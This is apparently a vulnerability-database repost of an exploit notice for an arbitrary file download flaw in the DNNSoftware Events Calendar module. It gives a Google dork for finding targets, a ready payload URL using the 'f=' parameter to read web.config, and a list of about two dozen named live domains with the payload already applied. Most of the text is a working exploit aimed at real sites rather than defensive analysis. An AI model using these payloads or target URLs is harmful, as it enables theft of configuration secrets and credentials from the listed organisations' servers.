DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download

2019.01.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-16

#################################################################### # Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 18/01/2019 # Vendor Homepage : dnnsoftware.com # Software Information Link : store.dnnsoftware.com/home/product-details/events-calendar # Software Version : 1.x and All Versions # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''Copyright 2019 by Associated Builders and Contractors'' inurl:''/desktopmodules/eventscalendar/'' # Vulnerability Type : CWE-16 [ Configuration ] #################################################################### # Description : ************* * Events Calendar is a calendar to add and display events with time and description in rich text editor. * DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently verify user-supplied input. * This may allow an attacker to gain access to sensitive information, which may aid in launching further attacks. * The attacker can download and read all and any files known by the name via '?f=' parameter. # Arbitrary File Download Exploit : ******************************* /desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config /desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE] #################################################################### # Example Vulnerable Sites : ************************* Note : (38.95.37.77) => There are 73 domains hosted on this server. [+] abcga.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcgmc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] mnabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abclaventura.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abccarolinas.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcnjc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcpnw.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcwestwa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abc-chesapeake.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] ocl.net/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] aeawave.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] tkhobby.nu/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcark.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] av-warehouse.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] nocabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] ezt.ca/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abccentralcal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcwpa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcnevada.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcsocal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] ctabc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcalaska.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config [+] abcfirstcoast.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top